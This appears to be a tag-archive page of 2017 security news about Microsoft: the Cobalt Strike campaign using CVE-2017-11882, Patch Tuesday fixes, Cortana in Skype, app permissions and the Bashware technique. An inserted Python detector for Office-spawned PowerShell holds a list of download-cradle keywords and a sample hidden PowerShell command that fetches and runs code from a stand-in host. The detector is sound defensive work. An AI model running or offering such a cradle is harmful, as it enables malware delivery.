Tag Archives: Microsoft

Hackers Exploit Recently Disclosed Microsoft Office Bug to Backdoor PCs


A recently disclosed, severe 17-year-old vulnerability in Microsoft Office that lets hackers install malware on targeted computers without user interaction is now being exploited in the wild to distribute backdoor malware.

First spotted by researchers at security firm Fortinet, the malware has been dubbed Cobalt because it uses a component from a powerful and legitimate penetration testing tool, called Cobalt Strike.

Cobalt Strike is software developed for red team operations and adversary simulations; it gives operators a covert communication channel into a compromised system.

The vulnerability (CVE-2017-11882) that the Cobalt malware uses to deliver the backdoor is a memory-corruption issue that allows unauthenticated, remote attackers to execute malicious code on the targeted system when a malicious file is opened, and potentially to take full control of it.

This vulnerability affects all versions of Microsoft Office and the Windows operating system, though Microsoft has already released a patch to address the issue. You can read more about the details and impact of the vulnerability in our previous article.


Since cybercriminals are quick to take advantage of newly disclosed vulnerabilities, the threat actors started delivering the Cobalt malware using the CVE-2017-11882 exploit via spam just a few days after its disclosure.

According to Fortinet researchers, the Cobalt malware is delivered through spam emails disguised as a notification from Visa regarding rule changes in Russia, with an attachment that includes a malicious RTF document, as shown.

The email also contains a password-protected archive, with the credentials to unlock it provided in the email body, in order to trick victims into believing that the email came from the legitimate financial service.

“This is [also] to prevent auto-analysis systems from extracting the malicious files for sandboxing and detection,” Fortinet researchers Jasper Manual and Joie Salvio wrote.

“Since a copy of the malicious document is out in the open… so it’s possible that this is only to trick the user into thinking that securities are in place, which is something one would expect in an email from a widely used financial service.”

Once the document is opened, the user is shown a plain document with the words “Enable Editing.” However, a PowerShell script silently executes in the background, which eventually downloads a Cobalt Strike client to take control of the victim’s machine.

With control of the victim’s system, hackers can “initiate lateral movement procedures in the network by executing a wide array of commands,” the researchers said.
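The detection a defender would want for the chain described above (an Office document that silently spawns PowerShell to fetch a second stage), as an added example that is not part of the article or of Fortinet's research. It walks a few constructed process-creation events, flags a script host whose ancestry within three hops includes an Office application, and notes download-cradle arguments; the event fields, file paths and the example.invalid URL are assumptions.

```python
# Added example (not from the article or Fortinet): flag a script host such as
# PowerShell launched underneath an Office application. Input events, field
# names and the URL are constructed; a real feed would come from Sysmon or EDR
# process-creation telemetry.
from dataclasses import dataclass
from typing import Dict, List, Optional

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Substrings typical of download cradles; "-enc " keeps its trailing space so
# it does not also match "-encodedcommand".
SUSPICIOUS_ARGS = ("downloadstring", "downloadfile", "-encodedcommand",
                   "-enc ", "-w hidden", "iex ")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process image
    cmdline: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(ev: ProcEvent, by_pid: Dict[int, ProcEvent],
                    max_depth: int = 3) -> Optional[ProcEvent]:
    """Walk up the parent chain and return the first Office process found."""
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            return None
        if basename(parent.image) in OFFICE_IMAGES:
            return parent
        cur = parent
    return None


def score_event(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Reasons this event looks like an Office-launched download cradle."""
    reasons: List[str] = []
    if basename(ev.image) not in SCRIPT_HOSTS:
        return reasons
    anc = office_ancestor(ev, by_pid)
    if anc is not None:
        reasons.append(f"script host spawned under {basename(anc.image)} (pid {anc.pid})")
    low = ev.cmdline.lower()
    hits = [a for a in SUSPICIOUS_ARGS if a in low]
    if hits:
        reasons.append("command line contains " + ", ".join(repr(h) for h in hits))
    return reasons


def find_suspicious(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every flagged event (empty dict if none)."""
    by_pid = {e.pid: e for e in events}
    return {e.pid: r for e in events if (r := score_event(e, by_pid))}


# Constructed sample telemetry: Word spawns cmd.exe, which spawns a hidden
# PowerShell downloader; a separate PowerShell started from Explorer is benign.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"WINWORD.EXE /n C:\Users\alice\Downloads\visa_notice.rtf"),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell ..."),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://stage.example.invalid/a')\""),
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\nightly_backup.ps1"),
]

if __name__ == "__main__":
    for pid, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Only the PowerShell under the Word document (pid 400) is flagged; the one started from Explorer is not, so the rule keys on ancestry rather than on PowerShell itself.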

According to the researchers, cybercriminals are always on the lookout for such vulnerabilities to exploit in their malware campaigns, and because many users ignore software updates, a significant number of systems remain unpatched and vulnerable to such attacks.

The best way to protect your computer against the Cobalt malware attack is to download the patch for the CVE-2017-11882 vulnerability and update your systems immediately.

Microsoft Patches 20 Critical Vulnerabilities

This month, Microsoft’s Patch Tuesday updates tackle fixes for 53 security bugs in Windows, Office, Internet Explorer, Edge, ASP.NET Core, .NET Core, and its Chakra Core browser engine.


Microsoft Provides Guidance on Mitigating DDE Attacks

Microsoft published guidance for Windows admins on how to safely disable Dynamic Data Exchange (DDE) fields in Office that are being used to spread malware in email-based attacks.


Microsoft Engineer Installs Google Chrome Mid-Presentation After Edge Kept Crashing


Ever since the launch of Windows 10, Microsoft has been heavily pushing its Edge browser, claiming it to be the best web browser over its competitors like Mozilla Firefox, Opera and Google Chrome in terms of speed and battery performance.

However, Microsoft must admit that most users make use of Edge or Internet Explorer only to download Chrome, which is by far the world’s most popular internet browser.

Something hilarious happened recently during a live demonstration, when a Microsoft engineer was caught on video switching from Edge to Chrome after the default Windows 10 browser stopped responding in the middle of the presentation.

That is really embarrassing.

The incident happened in the middle of a Microsoft Ignite conference session, where Microsoft presenter Michael Leworthy was demonstrating how one can migrate applications and data to the Microsoft Azure cloud service.

See what happens in the video below:

However, Leworthy was forced to pause his Azure presentation in the middle of the live demo session to download and install Google’s Chrome because the company’s own Edge browser kept crashing.

Guess what? This somewhat embarrassing and somewhat hilarious incident was recorded and uploaded to YouTube by Microsoft itself. You can check out the video yourself.

“I love it when demos break,” Leworthy said. “So while we’re talking here, I’m gonna go install Chrome,” he continued and started laughing, with many people in the audience giggling and cheering.

“And we’re not going to make Google better,” Leworthy added as he refused to check the box that sends crash reports and statistics back to Google.

Although Internet Explorer has long been considered to be “the best browser to download Google Chrome,” Microsoft Edge came out to be a competent successor to do the same thing even faster, as Leworthy took less than a minute to download and install Chrome.

Microsoft Issues Patches For Severe Flaws, Including Office Zero-Day & DNS Attack


As part of its “October Patch Tuesday,” Microsoft has today released a large batch of security updates to patch a total of 62 vulnerabilities in its products, including a severe MS Office zero-day flaw that has been exploited in the wild.

Security updates also include patches for Microsoft Windows operating systems, Internet Explorer, Microsoft Edge, Skype, Microsoft Lync and Microsoft SharePoint Server.

Besides the MS Office vulnerability, the company has also addressed two other publicly disclosed (but not yet targeted in the wild) vulnerabilities that affect the SharePoint Server and the Windows Subsystem for Linux.

October Patch Tuesday also fixes a critical Windows DNS vulnerability that could be exploited by a malicious DNS server to execute arbitrary code on the targeted system. Below you can find a brief technical explanation of all the above-mentioned critical and important vulnerabilities.

Microsoft Office Memory Corruption Vulnerability (CVE-2017-11826)

This vulnerability, classified by Microsoft as “important,” is caused by a memory corruption issue. It affects all supported versions of MS Office and has been actively exploited by the attackers in targeted attacks.

An attacker could exploit this vulnerability either by sending a specially crafted Microsoft Office file to the victims and convincing them to open it, or by hosting a site containing specially crafted files and tricking victims into visiting it.

Once opened, the malicious code within the booby-trapped Office file executes with the same rights as the logged-in user, so users with the least privilege on their systems are less affected than those with higher admin rights.

The vulnerability was reported to Microsoft by security researchers at China-based security firm Qihoo 360 Core Security, who initially detected an in-the-wild cyber attack which involved malicious RTF files and leveraged this vulnerability on September 28.

Microsoft Windows DNSAPI Remote Code Execution Vulnerability (CVE-2017-11779)

Among the other critical vulnerabilities patched by Microsoft is a remote code execution flaw in the Windows DNS client that affects computers running Windows 8.1 and Windows 10, and Windows Server 2012 through 2016.

The vulnerability can be triggered by a malicious DNS response, allowing an attacker to gain arbitrary code execution on Windows clients or Windows Server installations in the context of the software application that made the DNS request.

Nick Freeman, a security researcher from security firm Bishop Fox, discovered the vulnerability and demonstrated how an attacker connected to a public Wi-Fi network could run malicious code on a victim’s machine, escalate privileges and take full control over the target computer or server.

“This means that if an attacker controls your DNS server (e.g., through a Man-in-the-Middle attack or a malicious coffee-shop hotspot) – they can gain access to your system,” the researcher explains.

“This doesn’t only affect web browsers – your computer makes DNS queries in the background all the time, and any query can be responded to in order to trigger this issue.”

For full technical details, you can watch the video demonstration by Bishop Fox’s Dan Petro and head on to Bishop Fox’s blog post.

Windows Subsystem for Linux Denial of Service Vulnerability (CVE-2017-8703)

This denial of service (DoS) issue is yet another noteworthy vulnerability which resides in Windows Subsystem for Linux.

The vulnerability, classified by Microsoft as “important,” was previously publicly disclosed, but wasn’t found actively exploited in the wild.

The vulnerability could allow an attacker to run a malicious application that corrupts an object in memory, which eventually lets the application crash the target system and make it unresponsive.

The only Microsoft product affected by this vulnerability is Windows 10 (Version 1703). “The update addresses the vulnerability by correcting how Windows Subsystem for Linux handles objects in memory,” Microsoft said in its advisory.

Microsoft Office SharePoint XSS Vulnerability (CVE-2017-11777)

Another previously disclosed but not yet under attack vulnerability is a cross-site scripting (XSS) flaw in Microsoft SharePoint Server that affects SharePoint Enterprise Server 2013 Service Pack 1 and SharePoint Enterprise Server 2016.

The vulnerability, also classified by Microsoft as “important,” can be exploited by sending a maliciously crafted request to an affected SharePoint server.

Successful exploitation of this vulnerability could allow an attacker to perform cross-site scripting attacks on affected systems and execute malicious script in the same security context as the current user.

“The attacks could allow the attacker to read content that the attacker is not authorised to read, use the victim’s identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user,” Microsoft explains.

Besides these, the company has patched a total of 19 vulnerabilities in the scripting engine in Edge and Internet Explorer that could allow web pages to achieve remote-code execution, with the logged-in user’s permissions, via memory corruption flaws.

Just opening a web page could potentially land you in trouble by executing malware, spyware, ransomware, and other nasty software on the vulnerable computer.

More RCE And Other Vulnerabilities

Redmond also patched two vulnerabilities in the Windows font library that can allow a web page or document to execute malicious code on a vulnerable machine and hijack it on opening a file with a specially crafted embedded font or visiting a website hosting the malicious file.

The update also includes fixes for a bug in Windows TRIE (CVE-2017-11769) that allows DLL files to achieve remote code execution, and a programming error (CVE-2017-11776) in Outlook that leaves its emails open to snooping over supposedly secure connections.

Other issues patched this month include two remote code execution flaws in the Windows Shell and a remote code execution bug in Windows Search.

Microsoft also published an advisory warning users of a security feature bypass issue affecting the firmware of Infineon Trusted Platform Modules (TPMs).

Surprisingly, there are no security patches for Adobe Flash this month; Adobe has skipped October’s Patch Tuesday altogether.

Users are strongly advised to apply the October security patches as soon as possible in order to keep hackers and cybercriminals from taking control of their computers.

For installing security updates, simply head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.


Microsoft Cortana Can Now Read Your Skype Messages to Make Chat Smarter


Microsoft today announced built-in support for Cortana—an artificial intelligence-powered smart assistant—in Skype messenger on Android as well as iOS devices.

What purpose does it serve?

Microsoft wants its AI-based smart assistance to understand your conversations and help you with quick suggestions, ideas and information right inside your chat window.

“Cortana can also help you organize your day—no need to leave your conversations. Cortana can detect when you’re talking about scheduling events or things you have to do and will recommend setting up a reminder, which you will receive on all your devices that have Cortana enabled,” Skype said in a blog post.


In other words, Microsoft’s Cortana can now read your private Skype conversations.

Should You Worry About Your Privacy?

Yes, Cortana needs continuous monitoring of your private chats in order to come up with useful suggestions such as movie bookings, travel plans, nearby restaurants, scheduled meetings and so on.

Obviously, this feature would be a serious concern for privacy-conscious people who know that someone else is continuously reading their private conversations with friends or family, or their secret business plans with colleagues, even if Cortana has good intentions.

So should you be worried about this? It depends.

The answer is NO for those who are already using Skype. Since conversations over Skype are not end-to-end encrypted, Microsoft already has access to all your private communications in plain text, and you have nothing to hide from the company.

The answer is YES for those who are new to Skype and impressed with the idea of an artificial intelligence-based smart assistant, but who care more about their privacy.

How to Activate Cortana for Intelligent Skype Chats?

Currently, Cortana support for Skype is available only to users in the United States; it is optional, and you need to turn the assistant on manually on your mobile device.

To activate and allow Cortana to read all your chats and help you intelligently, you need to follow the below steps:

  • Upgrade to the latest version of Skype for Android or iOS
  • Tap on Cortana from your chat window
  • Start chatting with her; it will ask for one-time permissions
  • Select Agree, and that is it.

In-chat assistance is not a new concept. Google Allo and Facebook Messenger have already introduced AI-based personal assistants for chats, but naturally, these features come with privacy trade-offs.

Despite being opt-in, these intelligent in-chat assistants, including Cortana for Skype, could be easily used to spy on your interests for targeted advertisements.

Do you feel it is worth the risk to have AI-based quick replies and suggestions for calendar entries?

Let us know in the comments below.


Windows 10 to Give More Control Over App-level Permissions


Microsoft has been gradually changing its privacy settings in Windows 10 with the Fall Creators Update to give its users more control over their data.

In April, Microsoft addressed some initial privacy concerns in the Windows 10 Creators Update with simplified data collection levels—Security, Basic, Enhanced, and Full—and eventually revealed its data collection practices.

Now, the software giant is making another privacy-related change with the upcoming Windows 10 Fall Creators Update, which is due for release in October 2017, giving you much more control over what apps can do with your device.

Just like apps from your smartphone’s app store, apps from the Windows Store also require permission to access your computer’s sensitive capabilities such as the camera, microphone, calendar, contacts, and music, picture and video libraries.

While Android and iOS allow you to limit an app’s permissions to access these sensitive resources, Windows has so far granted these permissions to all apps implicitly, except for access to location data, which requires explicit user permission.

But that’s going to be changed.

For each new app installed on the Windows 10 Fall Creators Update, the operating system will prompt users for access to their device’s camera, microphone, contacts, calendar, and images and other information, requiring an explicit opt-in for each app.

“Starting with the Fall Creators Update, we’re extending this experience to other device capabilities for apps you install through the Windows Store,” Microsoft wrote in a post detailing the privacy improvements.

“You will be prompted to provide permission before an app can access key device capabilities or information such as your camera, microphone, contacts, and calendar, among others. This way you can choose which apps can access information from specific features on your device.”

When users install the Fall Creators Update, existing applications on their device will retain their permissions, but new apps installed from the official Windows Store will require their access to be enabled explicitly.

In order to review and manage your existing app permissions, head on to Start → Settings → Privacy. To learn more about Windows app permissions, head on to this link.

Microsoft is set to test these privacy changes with Windows Insiders shortly. The Windows 10 Fall Creators Update will be released on October 17th.


Linux Subsystem on Windows 10 Allows Malware to Become Fully Undetectable


Microsoft has been expressing its love for Linux for almost three years now, and this love costs Microsoft an arm and a leg.

Last year, Microsoft surprised everyone by announcing the arrival of Windows Subsystem for Linux (WSL) in Windows 10, which brings the Linux command-line shell to Windows, allowing users to run native Linux applications on Windows system without virtualization.

However, security researchers from security firm Check Point Software Technologies have discovered a potential security issue with the WSL feature that could allow malware families designed for Linux to target Windows computers, undetected by all current security software.

The researchers devised a new attack technique, dubbed Bashware, that takes advantage of Windows’ built-in WSL feature, which is now out of beta and is set to arrive in the Windows 10 Fall Creators Update in October 2017.

Bashware Attack Undetectable by All Anti-Virus & Security Solutions

According to Check Point researchers, the Bashware technique could be abused even by a known Linux malware family, because security solutions for Windows are not designed to detect such threats.

This new attack could allow an attacker to hide any Linux malware from even the most common security solutions, including next-generation anti-virus software, malware inspection tools, anti-ransomware solutions and other tools.

But why so? Researchers argue that existing security software packages for Windows systems have not yet been modified to monitor processes of Linux executables running on Windows operating system.

“Existing security solutions are still not adapted to monitor processes of Linux executables running on Windows OS, a hybrid concept which allows a combination of Linux and Windows systems to run at the same time,” Check Point researchers say.

“This may open a door for cyber criminals wishing to run their malicious code undetected, and allow them to use the features provided by WSL to hide from security products that have not yet integrated the proper detection mechanisms.”

Who is the Culprit? Microsoft or Security Vendors?

In order to run the target Linux application in an isolated environment, Microsoft introduced “Pico processes”—containers that allow ELF binaries to run on the Windows operating system.

During their tests, the Check Point researchers ran the Bashware attack against “most of the leading antivirus and security products on the market,” and successfully bypassed all of them.

This is because no security product monitors Pico processes, even though Microsoft already provides the Pico API, a special application programming interface that security companies can use to monitor such processes.

“Bashware does not leverage any logic or implementation flaws in WSL’s design. In fact, WSL seems to be well designed,” the researchers concluded.

“What allows Bashware to operate the way it does is the lack of awareness by various security vendors, due to the fact that this technology is relatively new and expands the known borders of the Windows operating system.”

Bashware Attack Requires Admin Rights—Is that Hard on a Windows PC?

Yes, Bashware requires administrator access on the target computers, but gaining admin privileges on Windows PCs via phishing attacks and/or stolen admin credentials is not a difficult task for a motivated attacker.

However, these additional attacks could also alert antivirus and security products, exposing the intrusion before the actual Bashware attack can be executed to hide malware.

Since WSL is not turned on by default, and users are required to manually activate “development mode” on their systems and reboot in order to use it, the risks posed by the feature are mitigated to some extent.

However, the Check Point researchers say it is a little-known fact that the developer mode can be enabled by modifying a few registry keys, which can be done silently in the background by the attackers with the right privileges.

The Bashware attack technique automates the required procedures by silently loading the WSL components, enabling developer mode, even downloading and extracting the Linux file system from Microsoft’s servers, and running malware.

No Need to Write Separate Malware Programs

What’s interesting about Bashware is that hackers using it are not required to write Linux malware in order to run it through WSL on Windows computers.

This extra effort is saved by the Bashware technique, which installs a program called Wine inside the downloaded Ubuntu user-space environment and then launches known Windows malware through it.

The malware then runs on Windows as Pico processes, which hides it from security software.

400 Million Computers Potentially Exposed to Bashware

The newly discovered attack technique does not leverage any vulnerability in WSL’s implementation; it works because of the lack of interest in and awareness of WSL among security vendors.

Since the Linux shell is now available to Windows users, researchers believe that Bashware can potentially affect any of the 400 million PCs currently running Windows 10 across the world.

Check Point researchers said their company has already upgraded its security solutions to combat such attacks and is urging other security vendors to update their next-generation anti-virus and security solutions accordingly.
